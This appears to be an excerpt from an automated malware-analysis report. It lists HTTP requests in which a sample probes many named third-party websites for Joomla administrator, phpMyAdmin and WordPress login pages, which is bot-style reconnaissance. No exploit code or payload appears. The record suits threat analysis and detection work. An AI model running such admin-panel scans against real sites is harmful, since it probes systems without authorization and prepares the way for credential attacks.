Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: waukesha-water.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: art-paix-di.orgAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://art-paix-di.org/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: glazing-bt.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: schussundtor.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: ksv-schwimmen.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: popular.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: d-brinkmann.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://d-brinkmann.de/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: markoren.noAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: caspiantravel.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: publichouse.ieAccept: /Accept-Encoding: deflate, gzipCookie: crumb=BejL2LT8df0oZDhjMTJjMWIyMTBiYmViMDRjODkzYTJkMWVlZWNiUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: amsantechnology.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: voltage-distribution.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: creativ-moebelwerkstaetten.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: braekling.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: iisalessandrini.itAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: cfca.euAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: mlbx.matrix.jpAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://mlbx.matrix.jp/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: schussundtor.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: ksv-schwimmen.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: popular.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: collevilca.itAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://collevilca.it/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: att.com.hkAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://att.com.hk/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: hotmail.fr.auAccept: /Accept-Encoding: deflate, gzipCookie: __tad=1708471566.1447398User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://hotmail.fr.au/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: hotmail.fr.auAccept: /Accept-Encoding: deflate, gzipCookie: __tad=1708471566.1141811User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://hotmail.fr.au/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: network-abilities.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://network-abilities.com/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: cpsgroupe.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://cpsgroupe.com/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: wefttechnologies.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://wefttechnologies.com/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: wilsonfamilyinsurance.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://wilsonfamilyinsurance.com/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: att.com.phAccept: /Accept-Encoding: deflate, gzipCookie: sid=6bfceafb-d047-11ee-9fdb-b2ef13fb2d8aUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://att.com.ph/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: schussundtor.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: archononline.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: netzschnipsel.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: upblue.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: hotmail.fr.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: amsantechnology.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: strategicimpact.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: att.com.sgAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.caspianseagulltravels.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: voltage-distribution.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: touktoukcie.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: pharmacie-vp.frAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: popular.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: sportclinic.co.ilAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: waukesha-water.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: acidvision.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: blauthlaw.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: imailzone.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: cfgteam.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: schussundtor.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: mwpmedia.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: breecetechnology.co.zaAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: hotmail.fr.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: hotmail.fr.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: att.com.phAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: publichouse.ieAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: derbyron.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: d-brinkmann.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: hotmail.fr.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: collevilca.itAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: cfca.euAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: cfgteam.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: montessorihawaii.orgAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: archononline.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: strategicimpact.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: eyegage.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: blauthlaw.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: network-abilities.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: wefttechnologies.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: hotmail.fr.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: hotmail.fr.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: cabinet-orsika.frAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: m-viper.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: upblue.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: art-paix-di.orgAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: eskimo.chAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: pharmacie-vp.frAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: att.com.phAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: breecetechnology.co.zaAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: joaz.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: netzschnipsel.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: gmcocorp.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: shinko-kensetsu.co.jpAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: archononline.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://archononline.com/administrator/
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: m-viper.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: att.com.hkAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: collevilca.itAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: hotmail.fr.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: hotmail.fr.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: network-abilities.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: cpsgroupe.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: eskimo.chAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: breecetechnology.co.zaAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://breecetechnology.co.za/administrator/
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: att.com.phAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: braekling.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: hotmail.fr.auAccept: /Accept-Encoding: deflate, gzipCookie: __tad=1708471569.6011695User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://hotmail.fr.au/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; lander_type=parking; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://att.com.au/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: hotmail.fr.auAccept: /Accept-Encoding: deflate, gzipCookie: __tad=1708471569.6086288User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://hotmail.fr.au/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: acidvision.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; lander_type=forwarder; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://acidvision.com/administrator/
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: touktoukcie.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: mlbx.matrix.jpAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: hotmail.fr.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: cpsgroupe.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: mwpmedia.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: publichouse.ieAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: montessorihawaii.orgAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: upblue.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: derbyron.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: breecetechnology.co.zaAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: collevilca.itAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://collevilca.it/wp-login.php
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.netzschnipsel.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: collevilca.itAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: hotmail.fr.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://hotmail.fr.au/wp-login.php
